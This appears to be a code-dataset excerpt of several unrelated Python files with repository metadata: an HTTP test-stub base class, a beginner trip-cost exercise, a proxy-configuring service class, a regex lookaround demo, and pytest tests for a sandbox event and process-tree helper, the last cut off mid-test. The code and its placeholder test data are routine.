33c6dc9bc3088a119e8d12ba191f0d976185b79d | 4,859 | py | Python | tests/AerTestCase.py | ethaeris/aeris-apisdk-py | 0aa41a3a50e5822fa2dabd7ff531588435b9eeb8 | [
"Apache-2.0"
] | null | null | null | tests/AerTestCase.py | ethaeris/aeris-apisdk-py | 0aa41a3a50e5822fa2dabd7ff531588435b9eeb8 | [
"Apache-2.0"
] | 2 | 2020-03-17T00:34:09.000Z | 2020-03-18T19:03:47.000Z | tests/AerTestCase.py | ethaeris/aeris-apisdk-py | 0aa41a3a50e5822fa2dabd7ff531588435b9eeb8 | [
"Apache-2.0"
] | 2 | 2020-02-13T01:33:02.000Z | 2020-04-01T21:03:08.000Z | # Copyright 2020 Aeris Communications Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest
| 42.252174 | 117 | 0.643754 | # Copyright 2020 Aeris Communications Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest
class AerTestCase(unittest.TestCase):
    """Base test case with helpers for stubbing and verifying HTTP API calls.

    All helpers deal in JSON payloads and produce callbacks compatible with
    the "responses" library's callback registration.
    """

    __default_response_headers = {'Content-Type': 'application/json'}

    def create_empty_request_empty_response_assertion(self, response_status,
                                                      response_headers=__default_response_headers):
        """
        Shorthand for a callback that expects no request body, checks only the
        'apiKey' query parameter (taken from the subclass' `apiKey`), and
        answers with an empty body and the given `response_status`.
        """
        return self.create_body_assertion(None, {'apiKey': self.apiKey}, '', response_headers,
                                          response_status=response_status)

    def create_body_assertion(self, expected_request_body, expected_request_query_params, response_body,
                              response_headers=__default_response_headers, response_status=200):
        """
        Build a "responses" callback that verifies the request's JSON body and
        query parameters, then returns a canned (status, headers, body) reply.

        `expected_request_body` of None asserts that no body was sent;
        `response_body` may be None, a ready string, or an object to be
        JSON-serialized.
        """
        def request_callback(request):
            # Query-string verification (skipped when nothing is expected).
            if expected_request_query_params:
                self.assertEqual(len(expected_request_query_params), len(request.params))
                for raw_key in request.params:
                    # The first key in request.params may carry the URL path
                    # before the query string — strip it off.
                    key = raw_key.split('?')[1] if '?' in raw_key else raw_key
                    self.assertEqual(request.params[raw_key], expected_request_query_params[key])
            # Body verification.
            if expected_request_body is None:
                self.assertEqual(expected_request_body, request.body)
            else:
                self.assertEqual(expected_request_body, json.loads(request.body))
            # Serialize the canned response body.
            if response_body is None:
                payload = None
            elif isinstance(response_body, str):
                payload = response_body
            else:
                payload = json.dumps(response_body)
            return (response_status, response_headers, payload)
        return request_callback

    def verify_api_exception(self, exception, expected_status_code, expected_body,
                             expected_headers=__default_response_headers):
        """
        Assert that an ApiException carries the HTTP status, body and headers
        a troubleshooter would need.
        """
        response = exception.response
        self.assertEqual(expected_status_code, response.status_code)
        self.assertEqual(expected_body, response.text)
        self.assertEqual(expected_headers, response.headers)
dbed7dab81dfda63e6fd738a8beb4beebb04f259 | 279 | py | Python | mundo-1/ex031.py | pablocarracci/cev-python | dd6c2db80be84ec732fc5efd895e11d48d298258 | [
"MIT"
] | null | null | null | mundo-1/ex031.py | pablocarracci/cev-python | dd6c2db80be84ec732fc5efd895e11d48d298258 | [
"MIT"
] | null | null | null | mundo-1/ex031.py | pablocarracci/cev-python | dd6c2db80be84ec732fc5efd895e11d48d298258 | [
"MIT"
] | null | null | null | # Exercício 031 - Custo da Viagem
km = float(input('Qual é a distância da sua viagem? '))
if km <= 200:
preco = 0.50 * km
else:
preco = 0.45 * km
print(f'Você está prestes a começar uma viagem de {km:.1f}Km.')
print(f'E o preço da sua passagem será de R${preco:.2f}')
# Exercise 031 - Trip Cost (Custo da Viagem)
# Asks for a trip distance (km) and prices the ticket:
# R$0.50/km up to 200 km, R$0.45/km beyond that.
km = float(input('Qual é a distância da sua viagem? '))
if km <= 200:
    preco = 0.50 * km
else:
    preco = 0.45 * km
print(f'Você está prestes a começar uma viagem de {km:.1f}Km.')
print(f'E o preço da sua passagem será de R${preco:.2f}')
| 0 | 0 | 0 |
8138fb939138f4babd6b5222fe85dfa78fe12bb5 | 1,899 | py | Python | Apps/phdigitalshadows/dsapi/service/ds_abstract_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 74 | 2019-10-22T02:00:53.000Z | 2022-03-15T12:56:13.000Z | Apps/phdigitalshadows/dsapi/service/ds_abstract_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 375 | 2019-10-22T20:53:50.000Z | 2021-11-09T21:28:43.000Z | Apps/phdigitalshadows/dsapi/service/ds_abstract_service.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 175 | 2019-10-23T15:30:42.000Z | 2021-11-05T21:33:31.000Z | # File: ds_abstract_service.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
from abc import ABCMeta
from ..httplib2 import Http, ProxyInfo, socks, proxy_info_from_environment
from dsapi.config.ds_proxy_config import DSProxyConfig
class DSAbstractService(object, metaclass=ABCMeta):
    """
    Abstract Service that provides http methods to implementing services.
    Proxy Settings - By default this class will use proxy settings from the environment.
    For more control, pass a DSProxyConfig object as the keyword argument 'proxy' to
    this class. The keyword argument will take precedence.
    """
    def _prepare_proxy(self, ds_proxy_config):
        """
        Transform a DSProxyConfig object to httplib ProxyInfo object
        :type ds_proxy_config: DSProxyConfig
        :return: ProxyInfo
        """
        # Translate the service's proxy-type enum into socks module constants.
        proxy_type_map = {
            DSProxyConfig.Type.HTTP: socks.PROXY_TYPE_HTTP,
            DSProxyConfig.Type.HTTP_NO_TUNNEL: socks.PROXY_TYPE_HTTP_NO_TUNNEL,
            DSProxyConfig.Type.SOCKS4: socks.PROXY_TYPE_SOCKS4,
            DSProxyConfig.Type.SOCKS5: socks.PROXY_TYPE_SOCKS5
        }
        return ProxyInfo(
            proxy_type=proxy_type_map[ds_proxy_config.proxy_type],
            proxy_host=ds_proxy_config.proxy_host,
            proxy_port=ds_proxy_config.proxy_port,
            proxy_rdns=ds_proxy_config.proxy_reverse_dns,
            proxy_user=ds_proxy_config.proxy_user,
            proxy_pass=ds_proxy_config.proxy_pass
        )
| 35.830189 | 88 | 0.695103 | # File: ds_abstract_service.py
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
from abc import ABCMeta
from ..httplib2 import Http, ProxyInfo, socks, proxy_info_from_environment
from dsapi.config.ds_proxy_config import DSProxyConfig
class DSAbstractService(object, metaclass=ABCMeta):
    """
    Abstract base for services issuing HTTP requests through httplib2.

    Proxy settings: by default, proxy configuration is read from the
    environment. Passing a DSProxyConfig via the `proxy` keyword argument
    takes precedence over the environment.
    """

    def __init__(self, proxy=None):
        # Explicit DSProxyConfig wins; otherwise fall back to the environment.
        if proxy is None:
            proxy_info = proxy_info_from_environment()
        else:
            proxy_info = self._prepare_proxy(proxy)
        self._http = Http(proxy_info=proxy_info)

    def _request(self, url, method='GET', body=None, headers=None):
        """Issue an HTTP request through the configured httplib2 client."""
        return self._http.request(url, method=method, body=body, headers=headers)

    def _prepare_proxy(self, ds_proxy_config):
        """
        Translate a DSProxyConfig into an httplib2 ProxyInfo.
        :type ds_proxy_config: DSProxyConfig
        :return: ProxyInfo
        """
        type_mapping = {
            DSProxyConfig.Type.HTTP: socks.PROXY_TYPE_HTTP,
            DSProxyConfig.Type.HTTP_NO_TUNNEL: socks.PROXY_TYPE_HTTP_NO_TUNNEL,
            DSProxyConfig.Type.SOCKS4: socks.PROXY_TYPE_SOCKS4,
            DSProxyConfig.Type.SOCKS5: socks.PROXY_TYPE_SOCKS5,
        }
        return ProxyInfo(
            proxy_type=type_mapping[ds_proxy_config.proxy_type],
            proxy_host=ds_proxy_config.proxy_host,
            proxy_port=ds_proxy_config.proxy_port,
            proxy_rdns=ds_proxy_config.proxy_reverse_dns,
            proxy_user=ds_proxy_config.proxy_user,
            proxy_pass=ds_proxy_config.proxy_pass,
        )
| 316 | 0 | 54 |
8549212bb74f6e4843b7cdc267130d4ade9f8fa2 | 292 | py | Python | coders/curso_regex/grupos/gruposEspeciais.py | flaviogf/Cursos | 2b120dbcd24a907121f58482fdcdfa01b164872c | [
"MIT"
] | 2 | 2021-02-20T23:50:07.000Z | 2021-08-15T03:04:35.000Z | coders/curso_regex/grupos/gruposEspeciais.py | flaviogf/Cursos | 2b120dbcd24a907121f58482fdcdfa01b164872c | [
"MIT"
] | 18 | 2019-08-07T02:33:00.000Z | 2021-03-18T22:52:38.000Z | coders/curso_regex/grupos/gruposEspeciais.py | flaviogf/Cursos | 2b120dbcd24a907121f58482fdcdfa01b164872c | [
"MIT"
] | 2 | 2020-09-28T13:00:09.000Z | 2021-12-30T12:21:08.000Z | import re
texto = 'Testando, grupos especias!'
texto2 = 'supermercado superacao hiperMERCADO'
# lookahead
print(re.findall(r'\w+(?=,|!)', texto))
# lookbehind
# positive
print(re.findall(r'(?<=super)\w+', texto2))
# negative
print(re.findall(r'(?<!super)mercado', texto2, re.IGNORECASE))
import re
texto = 'Testando, grupos especias!'
texto2 = 'supermercado superacao hiperMERCADO'
# lookahead: words immediately followed by ',' or '!'
print(re.findall(r'\w+(?=,|!)', texto))
# lookbehind
# positive: what comes right after 'super'
print(re.findall(r'(?<=super)\w+', texto2))
# negative: 'mercado' NOT preceded by 'super' (case-insensitive)
print(re.findall(r'(?<!super)mercado', texto2, re.IGNORECASE))
| 0 | 0 | 0 |
b7cd5d17978b44f90256038c6aa81a3a9d0d0a34 | 38,581 | py | Python | test/test_dynamic_service_helper.py | CybercentreCanada/assemblyline-v4-service | 465b4c3e231dce336b16ee37e829141d26e9738f | [
"MIT"
] | 6 | 2020-06-30T13:54:44.000Z | 2021-05-28T19:36:32.000Z | test/test_dynamic_service_helper.py | CybercentreCanada/assemblyline-v4-service | 465b4c3e231dce336b16ee37e829141d26e9738f | [
"MIT"
] | 17 | 2020-06-19T03:02:21.000Z | 2022-03-01T18:19:07.000Z | test/test_dynamic_service_helper.py | CybercentreCanada/assemblyline-v4-service | 465b4c3e231dce336b16ee37e829141d26e9738f | [
"MIT"
] | 8 | 2020-04-30T16:11:52.000Z | 2021-07-16T12:11:40.000Z | import pytest
import os
SERVICE_CONFIG_NAME = "service_manifest.yml"
TEMP_SERVICE_CONFIG_PATH = os.path.join("/tmp", SERVICE_CONFIG_NAME)
@pytest.fixture
@pytest.fixture
@pytest.fixture
| 55.115714 | 585 | 0.539462 | import pytest
import os
SERVICE_CONFIG_NAME = "service_manifest.yml"
TEMP_SERVICE_CONFIG_PATH = os.path.join("/tmp", SERVICE_CONFIG_NAME)
@pytest.fixture
def dummy_task_class():
    """Yield a bare-bones task double exposing the two lists the tests append to."""
    class DummyTask:
        def __init__(self):
            # Record of files attached via add_supplementary / add_extracted.
            self.supplementary = []
            self.extracted = []
    yield DummyTask
@pytest.fixture
def dummy_event_class():
    """Yield a minimal event double exposing only a ``timestamp`` attribute."""
    class DummyEvent:
        def __init__(self, item):
            # Only the timestamp is read by the timestamp-sorting tests.
            self.timestamp = item["timestamp"]
    yield DummyEvent
@pytest.fixture
def dummy_request_class(dummy_task_class):
    """Yield a dict-like request double that records attached files on its task.

    ``dummy_task_class`` is the fixture above; it yields the DummyTask class,
    which is instantiated here as ``self.task``.
    """
    class DummyRequest(dict):
        def __init__(self):
            super(DummyRequest, self).__init__()
            self.task = dummy_task_class()
        def add_supplementary(self, path, name, description):
            # Record the call so tests can inspect what was attached.
            self.task.supplementary.append({"path": path, "name": name, "description": description})
        def add_extracted(self, path, name, description):
            # Record the call so tests can inspect what was attached.
            self.task.extracted.append({"path": path, "name": name, "description": description})
    yield DummyRequest
def check_artifact_equality(this, that):
    """Return True if two Artifact-like objects have identical fields.

    Compares ``name``, ``path``, ``description`` and ``to_be_extracted``.
    """
    # Return the boolean expression directly instead of the
    # `if cond: return True / else: return False` anti-pattern.
    return (
        this.name == that.name
        and this.path == that.path
        and this.description == that.description
        and this.to_be_extracted == that.to_be_extracted
    )
def check_section_equality(this, that) -> bool:
    """Recursively compare two result-section trees for equality.

    Heuristics (and their definitions) are compared field by field, then the
    section's own fields, then every nested subsection in order.
    """
    # Step 1: compare heuristics. Equal only if both are absent, or both are
    # present and every definition/instance field matches.
    if this.heuristic and that.heuristic:
        this_def = this.heuristic.definition
        that_def = that.heuristic.definition
        definition_equality = (
            this_def.attack_id == that_def.attack_id
            and this_def.classification == that_def.classification
            and this_def.description == that_def.description
            and this_def.filetype == that_def.filetype
            and this_def.heur_id == that_def.heur_id
            and this_def.id == that_def.id
            and this_def.max_score == that_def.max_score
            and this_def.name == that_def.name
            and this_def.score == that_def.score
            and this_def.signature_score_map == that_def.signature_score_map
        )
        result_heuristic_equality = (
            definition_equality
            and this.heuristic.attack_ids == that.heuristic.attack_ids
            and this.heuristic.frequency == that.heuristic.frequency
            and this.heuristic.heur_id == that.heuristic.heur_id
            and this.heuristic.score == that.heuristic.score
            and this.heuristic.score_map == that.heuristic.score_map
            and this.heuristic.signatures == that.heuristic.signatures
        )
    else:
        # True only when neither side has a heuristic.
        result_heuristic_equality = not this.heuristic and not that.heuristic

    # Step 2: compare the section's own fields. Parent links are ignored since
    # callers always pass the root section.
    current_section_equality = (
        result_heuristic_equality
        and this.body == that.body
        and this.body_format == that.body_format
        and this.classification == that.classification
        and this.depth == that.depth
        and len(this.subsections) == len(that.subsections)
        and this.title_text == that.title_text
    )
    if not current_section_equality:
        return False

    # Step 3: recurse into subsections pairwise (lengths already match).
    return all(
        check_section_equality(subsection, that.subsections[index])
        for index, subsection in enumerate(this.subsections)
    )
def setup_module():
    """Write a minimal service manifest to /tmp before the tests run.

    The manifest is only created when it does not already exist; teardown_module
    removes it afterwards.
    """
    if not os.path.exists(TEMP_SERVICE_CONFIG_PATH):
        # Fix: the original leaked the file handle (open() without close()),
        # so the write was never guaranteed to be flushed. A context manager
        # closes and flushes deterministically.
        with open(TEMP_SERVICE_CONFIG_PATH, "w") as open_manifest:
            open_manifest.write("name: Sample\nversion: sample\ndocker_config: \n    image: sample\nheuristics:\n  - heur_id: 17\n    name: blah\n    description: blah\n    filetype: '*'\n    score: 250")
def teardown_module():
    """Delete the temporary service manifest created by setup_module, if any."""
    manifest_path = TEMP_SERVICE_CONFIG_PATH
    if os.path.exists(manifest_path):
        os.remove(manifest_path)
class TestEvent:
@staticmethod
@pytest.mark.parametrize("pid, image, timestamp, guid",
[
(None, None, None, None,),
(1, 1, "blah", "blah",),
]
)
def test_init(pid, image, timestamp, guid):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid, image, timestamp, guid)
assert e.pid == pid
assert e.image == image
assert e.timestamp == timestamp
assert e.guid == guid
@staticmethod
@pytest.mark.parametrize("pid, image, timestamp, guid, expected_result",
[
(None, None, None, None,
{"image": None, "pid": None, "timestamp": None, "guid": None}),
(1, "blah", 1.0, "blah",
{"image": "blah", "pid": 1, "timestamp": 1.0, "guid": "blah"}),
]
)
def test_convert_event_to_dict(pid, image, timestamp, guid, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=pid, image=image, timestamp=timestamp, guid=guid)
actual_result = e.convert_event_to_dict()
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("path, expected_result",
[
("blah", "x86"),
("C:\\program files\\blah", "x86"),
("C:\\program files (x86)\\blah", "x86_64"),
("C:\\syswow64\\blah", "x86_64"),
]
)
def test_determine_arch(path, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=1, image=path, timestamp=0, guid="blah")
actual_result = e._determine_arch(path)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("path, rule, expected_result",
[
("blah", {"pattern": "", "replacement": ""}, "blah"),
("blah", {"pattern": "ah", "replacement": "ue"}, "blah"),
("blah", {"pattern": "bl", "replacement": "y"}, "yah"),
]
)
def test_pattern_substitution(path, rule, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=1, image=path, timestamp=0, guid="blah")
actual_result = e._pattern_substitution(path, rule)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("path, rule, expected_result",
[
("blah", {"regex": "", "replacement": ""}, "blah"),
("blah", {"regex": "bl*ah", "replacement": "bl"}, "blah"),
("blah", {"regex": "\\bl*ah", "replacement": "bl"}, "blah"),
("blaah", {"regex": "bl*ah", "replacement": "blue"}, "blue"),
]
)
def test_regex_substitution(path, rule, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=1, image=path, timestamp=0, guid="blah")
actual_result = e._regex_substitution(path, rule)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("path, arch, expected_result",
[
("blah", None, "blah"),
("C:\\Program Files\\Word.exe", None, "?pf86\\word.exe"),
("C:\\Program Files (x86)\\Word.exe", None, "?pf86\\word.exe"),
("C:\\Program Files (x86)\\Word.exe", "x86_64", "?pf86\\word.exe"),
("C:\\Windows\\System32\\Word.exe", None, "?sys32\\word.exe"),
("C:\\Windows\\SysWow64\\Word.exe", None, "?sys32\\word.exe"),
("C:\\Windows\\SysWow64\\Word.exe", "x86", "?win\\syswow64\\word.exe"),
("C:\\Windows\\SysWow64\\Word.exe", "x86_64", "?sys32\\word.exe"),
("C:\\Users\\buddy\\AppData\\Local\\Temp\\Word.exe", None, "?usrtmp\\word.exe"),
("C:\\Users\\buddy\\Word.exe", None, "?usr\\word.exe"),
]
)
def test_normalize_path(path, arch, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import Event
e = Event(pid=1, image=path, timestamp=0, guid="blah")
actual_result = e._normalize_path(path, arch)
assert actual_result == expected_result
class TestProcessEvent:
    """Tests for the ProcessEvent constructor."""

    @staticmethod
    @pytest.mark.parametrize(
        "pid, ppid, image, command_line, timestamp",
        [
            (None, None, None, None, None),
            (1, 1, "blah", "blah", 1.0),
        ],
    )
    def test_init(pid, ppid, image, command_line, timestamp):
        """Every constructor argument must be stored verbatim on the instance."""
        from assemblyline_v4_service.common.dynamic_service_helper import ProcessEvent
        event = ProcessEvent(pid=pid, ppid=ppid, image=image, command_line=command_line, timestamp=timestamp)
        assert event.pid == pid
        assert event.ppid == ppid
        assert event.image == image
        assert event.command_line == command_line
        assert event.timestamp == timestamp
class TestNetworkEvent:
    """Tests for the NetworkEvent constructor."""

    @staticmethod
    @pytest.mark.parametrize(
        "protocol, src_ip, src_port, domain, dest_ip, dest_port, pid, timestamp",
        [
            (None, None, None, None, None, None, None, None),
            ("blah", "blah", 1, "blah", "blah", 1, 1, 1.0),
        ],
    )
    def test_init(protocol, src_ip, src_port, domain, dest_ip, dest_port, pid, timestamp):
        """Every constructor argument must be stored verbatim on the instance."""
        from assemblyline_v4_service.common.dynamic_service_helper import NetworkEvent
        n = NetworkEvent(protocol=protocol, src_ip=src_ip, src_port=src_port, domain=domain,
                         dest_ip=dest_ip, dest_port=dest_port, pid=pid, timestamp=timestamp)
        assert n.protocol == protocol
        # Fix: src_ip was passed to the constructor but never asserted in the
        # original test; sibling tests expect "src_ip" in event dicts, so it
        # must round-trip through the constructor too.
        assert n.src_ip == src_ip
        assert n.src_port == src_port
        assert n.domain == domain
        assert n.dest_ip == dest_ip
        assert n.dest_port == dest_port
        assert n.pid == pid
        assert n.timestamp == timestamp
class TestArtifact:
    """Tests for the Artifact constructor."""

    @staticmethod
    @pytest.mark.parametrize(
        "name, path, description, to_be_extracted",
        [
            (None, None, None, None),
            ("blah", "blah", "blah", True),
            ("blah", "blah", "blah", False),
        ],
    )
    def test_init(name, path, description, to_be_extracted):
        """Artifact stores its fields verbatim; any None argument must raise."""
        from assemblyline_v4_service.common.dynamic_service_helper import Artifact
        arguments = [name, path, description, to_be_extracted]
        if any(value is None for value in arguments):
            with pytest.raises(Exception):
                Artifact(name=name, path=path, description=description, to_be_extracted=to_be_extracted)
            return
        artifact = Artifact(name=name, path=path, description=description, to_be_extracted=to_be_extracted)
        assert artifact.name == name
        assert artifact.path == path
        assert artifact.description == description
        assert artifact.to_be_extracted == to_be_extracted
class TestEvents:
@staticmethod
@pytest.mark.parametrize("events, expected_events, expected_sorted_events, expected_process_events, expected_network_events", [([], [], [], [], [])])
def test_init(events, expected_events, expected_sorted_events, expected_process_events, expected_network_events):
from assemblyline_v4_service.common.dynamic_service_helper import Events
e = Events(events=events)
assert e.events == expected_events
assert e.sorted_events == expected_sorted_events
assert e.process_events == expected_process_events
assert e.network_events == expected_network_events
@staticmethod
@pytest.mark.parametrize("events, validated_events_num",
[
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}], 1),
([{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], 1),
([{}], 0),
]
)
def test_validate_events(events, validated_events_num):
from assemblyline_v4_service.common.dynamic_service_helper import Events
if validated_events_num:
assert len(Events._validate_events(events)) == validated_events_num
else:
with pytest.raises(ValueError):
Events._validate_events(events)
@staticmethod
@pytest.mark.parametrize("events, validated_events_num",
[
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}], 1),
([{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], 0),
]
)
def test_get_process_events(events, validated_events_num):
from assemblyline_v4_service.common.dynamic_service_helper import Events
validated_events = Events._validate_events(events)
assert len(Events._get_process_events(validated_events)) == validated_events_num
@staticmethod
@pytest.mark.parametrize("events, validated_events_num",
[
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}], 0),
([{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], 1),
]
)
def test_get_network_events(events, validated_events_num):
from assemblyline_v4_service.common.dynamic_service_helper import Events
validated_events = Events._validate_events(events)
assert len(Events._get_network_events(validated_events)) == validated_events_num
@staticmethod
@pytest.mark.parametrize("things_to_sort_by_timestamp, expected_result",
[
(None, []),
([], []),
(
[{"timestamp": 1}],
[{"timestamp": 1}]
),
(
[{"timestamp": 1}, {"timestamp": 2}],
[{"timestamp": 1}, {"timestamp": 2}]
),
(
[{"timestamp": 1}, {"timestamp": 1}],
[{"timestamp": 1}, {"timestamp": 1}]
),
(
[{"timestamp": 2}, {"timestamp": 1}],
[{"timestamp": 1}, {"timestamp": 2}]
),
(
[{"timestamp": 3}, {"timestamp": 2}, {"timestamp": 1}],
[{"timestamp": 1}, {"timestamp": 2}, {"timestamp": 3}]
),
]
)
def test_sort_things_by_timestamp(things_to_sort_by_timestamp, expected_result, dummy_event_class):
from assemblyline_v4_service.common.dynamic_service_helper import Events
dummy_things = []
dummy_results = []
if things_to_sort_by_timestamp is None:
assert Events._sort_things_by_timestamp(dummy_things) == []
return
for thing in things_to_sort_by_timestamp:
dummy_things.append(dummy_event_class(thing))
for result in expected_result:
dummy_results.append(dummy_event_class(result))
actual_result = Events._sort_things_by_timestamp(dummy_things)
for index, item in enumerate(actual_result):
assert item.__dict__ == dummy_results[index].__dict__
@staticmethod
@pytest.mark.parametrize("events, expected_events_dict",
[
([{"pid": 1, "image": "blah", "timestamp": 1, "guid": None}], {1: {'guid': None, 'image': 'blah', 'pid': 1, 'timestamp': 1}}),
([{"pid": 1, "image": "blah", "timestamp": 1, "guid": None}, {"pid": 2, "image": "blah", "timestamp": 1, "guid": None}], {1: {'guid': None, 'image': 'blah', 'pid': 1, 'timestamp': 1}, 2: {'guid': None, 'image': 'blah', 'pid': 2, 'timestamp': 1}}),
([{"pid": 1, "image": "blah", "timestamp": 1, "guid": "a"}, {"pid": 2, "image": "blah", "timestamp": 1, "guid": "b"}], {"a": {'guid': "a", 'image': 'blah', 'pid': 1, 'timestamp': 1}, "b": {'guid': "b", 'image': 'blah', 'pid': 2, 'timestamp': 1}}),
]
)
def test_convert_events_to_dict(events, expected_events_dict):
from assemblyline_v4_service.common.dynamic_service_helper import Event, Events
event_objects = [Event(pid=event["pid"], image=event["image"], timestamp=event["timestamp"], guid=event["guid"]) for event in events]
assert Events._convert_events_to_dict(event_objects) == expected_events_dict
class TestSandboxOntology:
@staticmethod
@pytest.mark.parametrize("events, expected_events", [([], [])])
def test_init(events, expected_events):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
so = SandboxOntology(events=events)
assert so.events == expected_events
@staticmethod
@pytest.mark.parametrize("processes_dict, expected_result",
[
# No processes
({}, []),
# One process
(
{1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1}},
[{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []}]
),
# One parent process and one child process
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},]
},
],
),
# Two unrelated processes
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},
{"pid": 2, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},
],
),
# Three processes consisting of a parent-child relationship and a rando process
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1},
3: {"pid": 3, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},
{"pid": 2, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[{"pid": 3, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "children": []},]
},
],
),
# Three processes consisting of a grandparent-parent-child relationship and one rando process
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2},
3: {"pid": 3, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 3},
4: {"pid": 4, "ppid": 4, "image": "blah", "command_line": "blah", "timestamp": 2},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2,
"children":
[{"pid": 3, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 3,
"children": []}, ]}]
},
{"pid": 4, "ppid": 4, "image": "blah", "command_line": "blah", "timestamp": 2, "children": []}
],
),
# Four processes consisting of a grandparent-parent-parent-child relationship
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2},
3: {"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3},
4: {"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[
{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2,
"children":
[{"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4, "children": []}]},
{"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3, "children": []}
]
},
],
),
# Four processes consisting of a grandparent-parent-parent-child relationship with non-ordered times
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3},
3: {"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2},
4: {"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1,
"children":
[
{"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2,
"children": []},
{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3,
"children":
[{"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4,
"children": []}]},
]
},
],
),
# Four processes consisting of a grandparent-parent-parent-child relationship with non-ordered times using guids
(
{
